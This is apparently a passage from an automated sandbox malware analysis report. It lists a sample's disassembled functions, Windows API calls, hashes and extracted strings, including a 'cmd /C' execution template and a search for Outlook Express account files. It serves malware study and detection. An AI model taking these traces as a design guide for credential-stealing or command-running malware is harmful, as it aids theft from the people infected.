                      • Opcode Fuzzy Hash: 23017333b32ea59625e874946afa460f698a67dfecab2d209234e2ef0765e03e
                      • Instruction Fuzzy Hash: 62F09073A00214BBCB11EFA8CC85DDBBBEEDF49340B004529FA05D7201EA70EE0486E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371E8C, Relevance: 6.0, APIs: 4, Instructions: 39memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371E98
                      • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00371EB3
                        • Part of subcall function 003885BA: wsprintfA.USER32 ref: 0038860C
                      • lstrcpy.KERNEL32(00000000,0039E520), ref: 00371ED4
                        • Part of subcall function 0038B8D2: memset.NTDLL ref: 0038B92E
                        • Part of subcall function 0038B8D2: memcpy.NTDLL(0000002C,?,00000010,00000000,00000000,00000054,00000054), ref: 0038B93C
                        • Part of subcall function 0038B8D2: RtlInitializeCriticalSection.NTDLL(00000008), ref: 0038B948
                        • Part of subcall function 0038B8D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B95B
                        • Part of subcall function 0038B8D2: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B975
                        • Part of subcall function 0038B8D2: CreateThread.KERNEL32(00000000,00000000,0038B64A,?,00000000,00000000), ref: 0038B9BF
                        • Part of subcall function 0038B8D2: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 0038B9DF
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00371EF5
                        • Part of subcall function 0038BA07: SetEvent.KERNEL32(?,00371F20,?,0039D270,?,00000000,003713EB), ref: 0038BA1B
                        • Part of subcall function 0038BA07: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038BA35
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA3E
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA4C
                        • Part of subcall function 0038BA07: RtlEnterCriticalSection.NTDLL(00000008), ref: 0038BA58
                        • Part of subcall function 0038BA07: RtlLeaveCriticalSection.NTDLL(00000008), ref: 0038BA81
                        • Part of subcall function 0038BA07: Sleep.KERNEL32(000001F4), ref: 0038BA90
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA9D
                        • Part of subcall function 0038BA07: LocalFree.KERNEL32(?), ref: 0038BAAB
                        • Part of subcall function 0038BA07: RtlDeleteCriticalSection.NTDLL(00000008), ref: 0038BAB5
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseCreateHandle$EventFreeHeap$AllocateDeleteEnterErrorExchangeInitializeInterlockedLastLeaveLocalMutexObjectSingleSleepThreadWaitlstrcpymemcpymemsetwsprintf
                      • String ID:
                      • API String ID: 1424382472-0
                      • Opcode ID: 38d532755e3f54874634110db78e028db987ea5c83c5e6a2f3704212c4740cf6
                      • Instruction ID: c6b37c0c1c09454356965165636aa03f010cd372919e04f9cc4cac875f60d9ea
                      • Opcode Fuzzy Hash: 38d532755e3f54874634110db78e028db987ea5c83c5e6a2f3704212c4740cf6
                      • Instruction Fuzzy Hash: A7F09037751311B7D6332765BC0FF4B3E5DEB81B61F050462FA05AA2E0DA6688008664
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037BFC2, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 0037BFDE
                      • GetLastError.KERNEL32(?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000,00000000,00000000), ref: 0037BFE9
                      • WaitNamedPipeA.KERNEL32(00002710), ref: 0037C00B
                      • WaitForSingleObject.KERNEL32(00000000), ref: 0037C019
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                      • String ID:
                      • API String ID: 4211439915-0
                      • Opcode ID: 3b25d82187d49c47c5c3333c16ac5b1c224f64a07c97b4a9b1023fb9f0e1b3cb
                      • Instruction ID: d30eedb8e34d16c616e3f7d2fdbe8d5bd1dd091986254ee91f4dd2d64e2e1ef0
                      • Opcode Fuzzy Hash: 3b25d82187d49c47c5c3333c16ac5b1c224f64a07c97b4a9b1023fb9f0e1b3cb
                      • Instruction Fuzzy Hash: D3F06231615120ABD7321B65AC4DB5BBB19EB047A1F228526F90DE61E0C3228C40D690
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006329A4, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00637614,006316B0,?,00637614), ref: 006329B3
                      • GetVersion.KERNEL32(?,00637614), ref: 006329C2
                      • GetCurrentProcessId.KERNEL32(?,00637614), ref: 006329D1
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00637614), ref: 006329EA
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentEventOpenVersion
                      • String ID:
                      • API String ID: 845504543-0
                      • Opcode ID: a995c3f0121ef49880adc3c6d7fe7913a68e192a6a378e65f0f7878219a147ff
                      • Instruction ID: b0df28c0a3411c32bac31fc3c49ea48905ce7186594b4cd96b41cbbc8f9d21bd
                      • Opcode Fuzzy Hash: a995c3f0121ef49880adc3c6d7fe7913a68e192a6a378e65f0f7878219a147ff
                      • Instruction Fuzzy Hash: 21F09AB0549B12ABE7709F6CFC2B7943BA7A31A721F10A152F501C62E0D7B08840CBC8
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00389765, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                      • memset.NTDLL ref: 003897A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrlenmemcpymemset
                      • String ID: ~FvR9
                      • API String ID: 3744489918-3041887914
                      • Opcode ID: 110d7f625abe3e20d507ac508b3093a386e78556033da8da4469484df8064ba7
                      • Instruction ID: 7269bca8c05dc8bbf49f785a93bbe46d9e01f155260df232611c92230decb226
                      • Opcode Fuzzy Hash: 110d7f625abe3e20d507ac508b3093a386e78556033da8da4469484df8064ba7
                      • Instruction Fuzzy Hash: 51E0E5B790431167CA326AB89C8CE5B2ADCEBD8350B050876F905D7201E525C81486B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038E89E, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E8A7
                      • Sleep.KERNEL32(0000000A,?,00000001,0037D9CC), ref: 0038E8B1
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0038E8D9
                        • Part of subcall function 00389E1C: StrTrimA.SHLWAPI(?,003973F4), ref: 00389E55
                        • Part of subcall function 00389E1C: StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389E72
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E8F5
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSectionTrim$EnterFreeHeapLeaveSleep
                      • String ID:
                      • API String ID: 4004549260-0
                      • Opcode ID: 13a275ad1169ebdf5e78fccaee2c0a461176ee4ac958e8d86f78e199cee67bc5
                      • Instruction ID: 7d7ba77aa14f0f318399535f9edab495d19de2d478a13cdd1971211c3bf2cf74
                      • Opcode Fuzzy Hash: 13a275ad1169ebdf5e78fccaee2c0a461176ee4ac958e8d86f78e199cee67bc5
                      • Instruction Fuzzy Hash: CCF01C712183409FEB13EB69EC4AF1A77ACAB14B40F154456F891C73A1CA32EC54DB19
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038E9DD, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E9E6
                      • Sleep.KERNEL32(0000000A,?,00000001,0037D9CC), ref: 0038E9F0
                      • HeapFree.KERNEL32(00000000), ref: 0038EA1E
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EA33
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                      • String ID:
                      • API String ID: 58946197-0
                      • Opcode ID: c98224ac68eca3cffcf9da474320ad881416f56e6a40bb33624cfa7a53dd2ab2
                      • Instruction ID: 409dc96ac6dca9f0d05fc57397d9aae20b1afee492f25fcb1c8edf8dc5035b8e
                      • Opcode Fuzzy Hash: c98224ac68eca3cffcf9da474320ad881416f56e6a40bb33624cfa7a53dd2ab2
                      • Instruction Fuzzy Hash: D0F0DAB86542019FEB1ADB29EC4AB153769BB08740F05455AF942D73A0CB75AC14CB14
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003913CB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00386F0A: CreateFileW.KERNEL32(0039F998,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00386F28
                        • Part of subcall function 00386F0A: GetFileSize.KERNEL32(00000000,00000000,?,?,003913E1,00000000,0039F998,00000000), ref: 00386F38
                        • Part of subcall function 00386F0A: ReadFile.KERNEL32(0039F998,00000000,00000000,00000000,00000000), ref: 00386F64
                        • Part of subcall function 00386F0A: GetLastError.KERNEL32(?,?,003913E1,00000000,0039F998,00000000), ref: 00386F89
                        • Part of subcall function 00386F0A: CloseHandle.KERNEL32(000000FF), ref: 00386F9A
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • strstr.NTDLL ref: 003914CB
                      • StrChrA.SHLWAPI(?,00000040), ref: 003914F4
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 00391309: memset.NTDLL ref: 00391333
                        • Part of subcall function 00391309: lstrlen.KERNEL32(003914A3,00000001,00000000,00000000,00000000,00000000,00002000,00000000,R9,?,?,?,?,?,?,003914A3), ref: 00391347
                        • Part of subcall function 00391309: memcpy.NTDLL(00000000,?,?), ref: 0039139C
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$Heaplstrlenmemcpymemset$AllocateCloseCreateErrorFreeHandleLastReadSizestrstr
                      • String ID: R9
                      • API String ID: 3000254853-134138977
                      • Opcode ID: 036b42df0dc0808beee2d04171c80a36ae4b0b75adaaa135e268dc77718b8a74
                      • Instruction ID: 1f7a0bf0a8aff80f68418ef49195796c4371a2b5e4cbf5056a04830bcfb03751
                      • Opcode Fuzzy Hash: 036b42df0dc0808beee2d04171c80a36ae4b0b75adaaa135e268dc77718b8a74
                      • Instruction Fuzzy Hash: 35517232D00216ABDF239F688C41BAEBBB9AF85710F178455F809FB241E774DE4087A5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037AB8D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0037ABBC
                      • lstrcpy.KERNEL32(00000000,?), ref: 0037ABD6
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 0037A045: RegCreateKeyA.ADVAPI32(80000001,?), ref: 0037A0B8
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,?), ref: 0037A0F9
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,00000000), ref: 0037A109
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,00000000,?), ref: 0037A175
                        • Part of subcall function 0037A045: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0037AC33,00000000,?,?,?), ref: 0037A199
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,?), ref: 0037A1BE
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,00000000), ref: 0037A1D3
                        • Part of subcall function 00379EE0: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00379F3B
                        • Part of subcall function 00379EE0: RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00379F66
                        • Part of subcall function 00379EE0: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379F85
                        • Part of subcall function 00379EE0: HeapFree.KERNEL32(00000000,00000000), ref: 00379FE6
                        • Part of subcall function 00379EE0: memcpy.NTDLL(?,00000000,Hp9,00000000,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048), ref: 0037A008
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocatememcpy$CloseCreatelstrcpylstrlenmemset
                      • String ID: http
                      • API String ID: 3911341088-2541227442
                      • Opcode ID: 0dc7213d2ab6aa4c2f3436e6b94fd6501f3129213fb836c67ed03bece1d5ea9a
                      • Instruction ID: a170bef22c6217934c439acb105057a00c279b827614ed13bca9cdf7662c4160
                      • Opcode Fuzzy Hash: 0dc7213d2ab6aa4c2f3436e6b94fd6501f3129213fb836c67ed03bece1d5ea9a
                      • Instruction Fuzzy Hash: 2041397190060ABFDF23DFA4CC84AAE7BB9FB48300F118466F51996260DB79AD10DF61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003777C6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106synchronizationCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0037787C
                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0037789D
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$ObjectSingleWait$CloseCriticalFirstFreeNextSectionmemset$EnterHeapLeaveLocallstrlenwcscpy
                      • String ID: R9
                      • API String ID: 1001867990-134138977
                      • Opcode ID: e54c7b3c9857a391038a1f78ffe8193aef54523fa9e8a69f74ec2e45215549b4
                      • Instruction ID: ab49eb852aab4341f84d6d0b682f43e75fe11a7a97cebeeb603544a5a9d7a9ac
                      • Opcode Fuzzy Hash: e54c7b3c9857a391038a1f78ffe8193aef54523fa9e8a69f74ec2e45215549b4
                      • Instruction Fuzzy Hash: EE313F72518205AFC722AF64CC8982FBBE9FB88358F11492AF48897121E735DD05DB52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003795B2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      • HeapFree.KERNEL32(00000000,?,?), ref: 0037969B
                        • Part of subcall function 00389807: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0038F8D5,00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000), ref: 00389810
                        • Part of subcall function 00389807: mbstowcs.NTDLL ref: 00389837
                        • Part of subcall function 00389807: memset.NTDLL ref: 00389849
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,00000004,00000002,?,00000016,00000000,00000000,00000004,00000004,?,20000013,00000000), ref: 0038FE5E
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32 ref: 0038FE78
                      • wcstombs.NTDLL ref: 0037967F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$CriticalFreeHeapLeaveSectionlstrlenmbstowcsmemsetwcstombs
                      • String ID: ZN9
                      • API String ID: 3141939236-2945816823
                      • Opcode ID: 4a9feb752ba8ffcc720f0e84435dca81cc907e23ef9c737469b25908afc31bd8
                      • Instruction ID: 40371a3f6f0a57391bb65e73afa7725d3e65ae5825b5b4a679ad2430e7120da7
                      • Opcode Fuzzy Hash: 4a9feb752ba8ffcc720f0e84435dca81cc907e23ef9c737469b25908afc31bd8
                      • Instruction Fuzzy Hash: 2F31167150122AAFCF339F55C884BAE7B69BF18B60F16C626FD094A110D73999A0DFD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00391018, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97registrystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • lstrlenW.KERNEL32(0039F7B4,?,00000000), ref: 00391073
                        • Part of subcall function 00390D1B: memset.NTDLL ref: 00390D78
                        • Part of subcall function 00390D1B: LocalFree.KERNEL32(00000000), ref: 00390EF3
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?), ref: 003910F9
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$AllocateCloseLocallstrlenmemset
                      • String ID: EW9
                      • API String ID: 1398430810-602920354
                      • Opcode ID: ceca93b027c854362e108dd8926e7e1b10d98a7bea841f5c3e01b4e254cb2d32
                      • Instruction ID: bade0887d16d35adafa1ed68df998e84bf131b90d90a11be8e88a503bc1c462d
                      • Opcode Fuzzy Hash: ceca93b027c854362e108dd8926e7e1b10d98a7bea841f5c3e01b4e254cb2d32
                      • Instruction Fuzzy Hash: 66316DB2108246BFDF139F50DC85C6BBFADFB84398F10492AF585A1161D7328D94DBA2
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B52C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00004004), ref: 0037B57E
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0037B598
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateCreateEventHeap
                      • String ID: gU9
                      • API String ID: 4104841997-705701294
                      • Opcode ID: 894799de162edca0a4809ba6b3ec69bbf35b9e0d53aeafb52b216c6bde1332b0
                      • Instruction ID: 0e35913328a01c9c7d292b59f9f515661eb95c9a3d5560d0d812dca8e5fdfe7e
                      • Opcode Fuzzy Hash: 894799de162edca0a4809ba6b3ec69bbf35b9e0d53aeafb52b216c6bde1332b0
                      • Instruction Fuzzy Hash: 5E114CB2200205AFD7319B64CCC4E67B7FDEF49764B158829F64AD7550D73AEC418B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00389E1C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • StrTrimA.SHLWAPI(?,003973F4), ref: 00389E55
                      • StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389E72
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Trim$AllocateHeap
                      • String ID: ~FvR9
                      • API String ID: 3808977111-3041887914
                      • Opcode ID: 02ecdaf10cf4dcbc596a584b9c0777604bbd204f52d0288c45896534c8872e49
                      • Instruction ID: aaf7097ac73b262e55eeb378e3cd439c8d4a74ef14dd6667bf336acf7bc32731
                      • Opcode Fuzzy Hash: 02ecdaf10cf4dcbc596a584b9c0777604bbd204f52d0288c45896534c8872e49
                      • Instruction Fuzzy Hash: 4501B9716053215BD222DF59CC48F3BBF9CEB89B90F16155AF881C7240DA61DC0293A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00387416, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • mbstowcs.NTDLL ref: 00387446
                      • mbstowcs.NTDLL ref: 0038746C
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmbstowcsmemset$AllocateEnterFreeLeavewcscpy
                      • String ID: account{*}.oeaccount
                      • API String ID: 3268584642-4234512180
                      • Opcode ID: e5c431615e16dabe095f2f77b223f45988cad9afbfc6dbc60a0e56d21f607755
                      • Instruction ID: 529aec821bcb34e9ca7998c322a705a16c2bd6daf407313f0e629a59adb6b3e6
                      • Opcode Fuzzy Hash: e5c431615e16dabe095f2f77b223f45988cad9afbfc6dbc60a0e56d21f607755
                      • Instruction Fuzzy Hash: C2019673910208B7CF22BBE9CC86F9F7EADEB48710F104465F504E7141EA75DA0587A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037BBDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0037BC08
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037BC57
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree
                      • String ID: L"7
                      • API String ID: 2488874121-2580434585
                      • Opcode ID: 3a1594ae445d1f50fb47049091782824ced81e7d61c6e48e2a32024cb08f789f
                      • Instruction ID: ad2a09b242052523cd7568a726aa5288862852b52fae47d866cd6ba69cb767a7
                      • Opcode Fuzzy Hash: 3a1594ae445d1f50fb47049091782824ced81e7d61c6e48e2a32024cb08f789f
                      • Instruction Fuzzy Hash: 23115B75600224AFC723AB65DD89D6BBB7CFF867907108456F40987224DB359D41CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377A7F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00377AA5
                        • Part of subcall function 003776C1: memset.NTDLL ref: 003776D9
                        • Part of subcall function 003776C1: lstrlenW.KERNEL32(00000000,00000000,00000000,0039CD50,00000000,cmd /C "%s> %s1"), ref: 00377712
                        • Part of subcall function 003776C1: wcstombs.NTDLL ref: 0037771C
                        • Part of subcall function 003776C1: CreateProcessA.KERNEL32(00000000,00377AD2,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 00377750
                        • Part of subcall function 003776C1: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00377771
                        • Part of subcall function 003776C1: GetExitCodeProcess.KERNEL32(?,?), ref: 0037778E
                        • Part of subcall function 003776C1: GetLastError.KERNEL32 ref: 003777A6
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 00377B09
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapProcess$AllocateCodeCreateErrorExitFreeLastMultipleObjectsWaitlstrlenmemsetwcstombs
                      • String ID: cmd /C "%s> %s1"
                      • API String ID: 553568828-3818503316
                      • Opcode ID: 866a729b50c62e94591eb7874d7f55acee35c41f09f101880f2f70c4dad3531b
